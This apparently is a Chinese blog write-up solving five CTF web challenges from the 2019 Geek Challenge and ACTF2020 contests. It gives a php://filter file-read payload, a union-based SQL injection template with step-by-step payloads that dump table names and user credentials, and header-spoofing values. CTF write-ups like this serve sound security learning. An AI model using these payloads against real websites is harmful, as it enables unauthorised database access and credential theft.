[极客大挑战 2019] Knife

[ACTF2020 新生赛] Include

[ACTF2020 新生赛] Exec

[极客大挑战 2019] LoveSQL

[极客大挑战 2019] Http

  • # [极客大挑战 2019] Knife

    直接连蚁剑就行。flag 在根目录。

  • # [ACTF2020 新生赛] Include

    进入后看见 tips,直接进行 php 伪协议读文件。

    image-20210608200029121?file=php://filter/read=convert.base64-encode/resource=flag.php

  • # [ACTF2020 新生赛] Exec

    直接就额外命令执行,没有任何过滤

image-20210608200532981

  • # [极客大挑战 2019] LoveSQL

    sql 注入没有任何过滤,直接一套操作。在 GET 方式传入 #要进行 url 编码 %23

    /check.php?username=1' union select 1,2,3%23&password=1

    位置 2,3 为回显位置。

    记住公式,直接套

    查数据库:(select database())
    
    查表:(select  group_concat(table_name) from information_schema.tables where  table_schema=database())
    
    查字段:(select group_concat(column_name) from information_schema.columns where table_name='表')
    
    查数据:select 字段 from 表
    

    查数据库

    Payload:?username=1' union select null,null,(select database())%23&password=2
    

    查表名

    payload:?username=1' union select null,null,(select  group_concat(table_name) from information_schema.tables where  table_schema='geek')%23&password=2
    

    查字段

    Payload:?username=1' union select null,null,( select group_concat( column_name ) from information_schema.columns where  table_name='geekuser')%23&password=2
    

    查数据,得到 flag

    Payload:?username=1' union select null,null,group_concat(id,0x3a,username,0x3a,password) from geek.l0ve1ysq1%23&password=2
    
  • # [极客大挑战 2019] Http

F12 找到 Secret.php

修改几个请求头。

User-Agent: Syclover

referer: https://www.Sycsecret.com

X-Forwarded-For: 127.0.0.1

得到 flag

更新于 阅读次数

请我喝[茶]~( ̄▽ ̄)~*

zeroc 微信支付

微信支付

zeroc 支付宝

支付宝

zeroc 贝宝

贝宝